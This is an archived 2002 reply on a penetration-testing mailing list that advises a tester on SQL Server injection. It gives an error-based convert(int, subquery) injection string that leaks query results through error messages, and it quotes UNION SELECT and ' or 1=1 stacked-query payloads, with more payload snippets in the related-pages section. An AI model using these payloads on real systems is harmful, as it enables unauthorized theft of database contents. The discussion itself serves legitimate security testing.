Re: sql injection - operand type clash

• Previous message: Kevin Spett: "Re: Send output to file in SQL"
• In reply to: mel: "sql injection - operand type clash"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Kevin Spett" <kspett@spidynamics.com>
To: "mel" <meling@scan-associates.net>, <pen-test@securityfocus.com>
Date: Fri, 15 Mar 2002 14:45:04 -0800

> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
> incompatible with int
>
> I have tried
>
> union select username,1,1,.... (20+ columns) from table
> union select 1,username,1,1....
> union select 1,1,username,1...

Yeah, that can eat up some time.
Try using the convert() hack to get the result of your query back in an
error message. Assuming that you're dealing with a quoted vulnerability try
this injection string:
' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN
('knownvalue', 'knownvalue2'))) %2b '

You should get a convert error back that includes the result of the
subquery.

> I've also tried union select convert(sql_variant,username),1,1,...

I think sql_variant only works in the most recent version of SQL Server, so
it may not even be a recognized data type

> My second problem is that I cannot execute this:
http://target/da.asp?userid=user' or 1=1; select * from
information_schema.tables--

You're not likely to get the results of a stacked query in your returned
page. Stacking queries is mostly useful for executing stored procedures.

Good luck.

Kevin Spett
SPI Dynamics, Inc.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Previous message: Kevin Spett: "Re: Send output to file in SQL"
• In reply to: mel: "sql injection - operand type clash"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages RE: SQL injection - get more values ... One solution is to try to find the exact columns to perform a union ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ... (Pen-Test) RE: CFM SQL injection ... You should better use union or alike get unauthorized data from the ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) SQL injection - get more values ... i'm trying to get some info from clients table and email field.... ... ') union select sumfrom clients-- ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) Re: SQL INJECTION - ORACLE ... Try seeing if using a subselect or a union works. ... ') UNION SELECT blah, blah, blah FROM bleh WHERE (''=' ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... (Pen-Test) Re: SQL INJECTION IN Coldfusion ... UNION file.cfm?id=4567 UNION SELECT TOP 3 FROM mrro-- ... >> Intelligence Alert ... For more information on SecurityFocus' SIA ... (Pen-Test)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint